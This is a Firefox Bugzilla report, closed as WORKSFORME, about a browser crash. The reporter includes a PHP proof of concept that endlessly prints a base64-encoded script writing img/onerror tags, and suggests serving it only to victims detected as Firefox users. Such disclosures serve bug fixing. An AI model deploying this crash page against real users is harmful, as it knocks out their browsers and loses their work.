Firefox crashes on infinitely long page

RESOLVED WORKSFORME

Status

()

Firefox
Untriaged
RESOLVED WORKSFORME
3 years ago
2 years ago

People

(Reporter: ashesh1708, Unassigned)

Tracking

({crash, csectype-dos})

36 Branch
x86_64
Windows 8.1
crash, csectype-dos
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

3 years ago
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36

Steps to reproduce:

Mozilla Firefox JS POC 
####################################################### 
Mozilla Firefox is unable to handle the Code and crash without the posibility of recover tabs. 
Better way to explote the vulnerability is Using a PHP scripts that check's if victim is using firefox browser them 
print the crash exploit. 

<!DOCTYPE html>
<html>
<body>
<?php
$exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+'; 
$firefox = true;
if ($firefox)
{
while(1) {
print(base64_decode($exploit));
}
}
?>
</body>
</html>


Actual results:

Crash


Expected results:

Firefox should handle the crash
Group: core-security
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: crash, csectype-dos
Summary: Security → Firefox crashes on infinitely long page
Hi,

I didn't managed to reproduce this on the latest release(43.0.2) nor the latest Nightly(46.0a1).

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20151221130713

User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0
Build ID: 20151223030323

Can you please try to reproduce this on the latest release(43.0.2), latest Nightly(46.0a1) and provide the results?
When doing this, you could create a new clean Firefox profile, or maybe test in safe mode, as some of this issues may be caused by third party installed addons or custom settings (https://support.mozilla.org/en-US/kb/troubleshoot-and-diagnose-firefox-problems).

Thanks,
Vlad.
Flags: needinfo?(ashesh1708)
Hi,

Considering the facts that after a crash Mozilla FF restores the tabs that were opened and the reporter did not provide more information on my request, I will mark this issue as Resolved - WFM. 
If you can still reproduce this, feel free to reopen it and provide the requested information.

Thanks.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Flags: needinfo?(ashesh1708)
Resolution: --- → WORKSFORME
You need to log in before you can comment on or make changes to this bug.